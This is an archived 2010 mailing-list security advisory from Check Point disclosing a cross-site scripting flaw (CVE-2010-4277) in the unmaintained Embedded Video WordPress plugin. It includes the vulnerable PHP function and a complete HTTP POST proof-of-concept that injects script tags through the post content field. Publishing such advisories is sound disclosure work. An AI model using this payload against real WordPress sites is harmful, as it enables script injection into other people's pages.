lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <50D13E31158CB84E8421A703294682FB1421D288E5@USEXCHANGE.ad.checkpoint.com>
Date: Fri, 17 Dec 2010 09:49:55 -0800
From: Rodrigo Branco <rbranco@...ckpoint.com>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
	"full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Embedded Video WordPress Plugin Cross Site
 Vulnerability (XSS) - CVE-2010-4277

Dear List,

I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability.




Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

Embedded Video WordPress Plugin Cross Site Scripting Vulnerability
CVE-2010-4277


INTRODUCTION

Embedded Video is a WordPress Plugin created by Jovel Stefan to easily embedded videos in blog posts.  The videos can be uploaded to the web server
or come from external portals (like YouTube, Google Video and others).  Links to the video on the video portal or for download of the video can be
automatically generated as well.  The linktext is also configurable individually. Furthermore a fixed prefix for the linktext can be determined. The 
videos can be integrated easily by using the built-in WYSIWYG editor.  The plugin has a Cross Site Script (XSS) vulnerability.

This problem was confirmed in the latest version of the plugin, other versions maybe also affected.  

The developer of the replied to the advisory in a very responsible and fast manner, but unfortunately, there will be no updates due to the fact that 
this plugin is not maintained anymore.


CVSS Scoring System

The CVSS score is: 6.4
	Base Score: 6.7
	Temporal Score: 6.4
We used the following values to calculate the scores:
	Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N
	Temporal score is: E:F/RL:U/RC:C


DETAILS

The file lembedded-video.php does not sanitize content variable, it is possible to inject malformed data by Javascript.

Code affected:

function embeddedvideo_plugin($content) {
	$output = preg_replace_callback(REGEXP_1, 'embeddedvideo_plugin_callback', $content);
	$output = preg_replace_callback(REGEXP_2, 'embeddedvideo_plugin_callback', $output);
	$output = preg_replace_callback(REGEXP_3, 'embeddedvideo_plugin_callback', $output);
	return ($output);
}

Request:
http://<server>/wordpress/wp-admin/post.php
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.12) Gecko/20101026
Firefox/3.6.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://<server>/wordpress/wp-admin/post.php?post=8&action=edit&message=1
C o o k i e : w o r d p r e s s _ b b f a 5 b 7 2 6 c 6 b 7 a 9 c f 3 c d a 9 3 7 0 b e 3 e e 9 1 = a d m i n
%7C1290110435%7C7f9fa1a66aec0259906ea15086aea0c8; wp-settings-time-1=1289940308;
w o r d p r e s s _ t e s t _ c o o k i e = W P + C o o k i e + c h e c k ;
w o r d p r e s s _ l o g g e d _ i n _ b b f a 5 b 7 2 6 c 6 b 7 a 9 c f 3 c d a 9 3 7 0 b e 3 e e 9 1 = a d m i n
%7C1290110435%7C68b064d813dd8bfaa5d2d2cdf757848e; wp-settings-1=m1%3Do
%26m6%3Dc%26m7%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 1786
_wpnonce=b2bc367f9c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost
% 3 D 8 % 2 6 a c t i o n % 3 D e d i t % 2 6 m e s s a g e
%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=post&original_
post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin
%2Fpost.php%3Fpost%3D8%26action%3Dedit&_wp_original_http_referer=http%3A%2F
%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action
% 3 D e d i t & p o s t _ I D = 8 & a u t o s a v e n o n c e = 9 6 2 9 3 9 1 7 c 9 & m e t a - b o x - o r d e r -
n o n c e = c 2 f e 5 5 3 5 c 4 & c l o s e d p o s t b o x e s n o n c e = b a d 9 d c 7 7 5 b & w p -
preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_v
isibility=public&visibility=public&post_password=&mm=11&jj=17&aa=2010&hh=00&mn=05&ss=33&hi
dden_mm=11&cur_mm=11&hidden_jj=17&cur_jj=17&hidden_aa=2010&cur_aa=2010&hidden_hh=00
&cur_hh=00&hidden_mn=05&cur_mn=36&original_publish=Update&save=Update&post_category
% 5 B % 5 D = 0 & p o s t _ c a t e g o r y % 5 B % 5 D = 1 & n e w c a t e g o r y = N e w + C a t e g o r y
+Name&newcategory_parent=-1&_ajax_nonce-add-category=62352e38f5&tax_input%5Bpost_tag
% 5 D = & n e w t a g % 5 B p o s t _ t a g
%5D=&post_title=testando&samplepermalinknonce=4a0d9c8491&content=%5Byoutube+%3Cscript
+type%3D%22text%2Fjavascript%22%3E%2F%2F+%3C%21%5BCDATA%5B%0D%0Aalert
%281%29%0D%0A%2F%2F+%5D%5D%3E%3C%2Fscript%3E+%3Cscript+type%3D%22text
%2Fjavascript%22%3E%2F%2F+%3C%21%5BCDATA%5B%0D%0Aalert%282%29%0D%0A%2F
%2F+%5D%5D%3E%3C%2Fscript%3E%5D&excerpt=&trackback_url=&meta%5B6%5D%5Bkey
%5D=_edit_last&_ajax_nonce=5453d93de8&meta%5B6%5D%5Bvalue%5D=1&meta%5B9%5D
%5Bkey%5D=_edit_lock&_ajax_nonce=5453d93de8&meta%5B9%5D%5Bvalue
%5D=1289954192&meta%5B8%5D%5Bkey%5D=_wp_old_slug&_ajax_nonce=5453d93de8&meta
% 5 B 8 % 5 D % 5 B v a l u e % 5 D = & m e t a k e y i n p u t = & m e t a v a l u e = & _ a j a x _ n o n c e - a d d -
meta=9453fa7f77&advanced_view=1&comment_status=open&ping_status=open&post_name=testan
do&post_author_override=1

CREDITS

This vulnerability has been brought to our attention by Wagner Elias from Conviso IT Security company (http://www.conviso.com.br) and researched 
internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).




Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies
http://www.checkpoint.com/defense
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ